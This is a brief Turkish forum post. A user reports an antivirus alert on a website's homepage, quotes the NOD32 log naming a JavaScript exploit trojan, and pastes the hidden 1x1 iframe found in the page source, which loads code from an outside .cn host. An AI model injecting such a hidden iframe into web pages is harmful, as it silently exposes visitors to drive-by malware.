az evel
www.r10.net ana sayfasına giriş yaptıgımda nod32 uyarı verdi
09.04.2009 01:13:18 HTTP filtresi dosya
http://hyperliteautoservices.cn/index.php JS/Exploit.Agent.AFH truva atı bağlantı sonlandırıldı - karantinaya alındı CASPER\Administrator Uygulama web'e ulaştığında tehdit algılandı: C:\Program Files\Mozilla Firefox\firefox.exe.
sayfanın kaynagına baktım truva atı bu iframe kodundan geliyor
<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>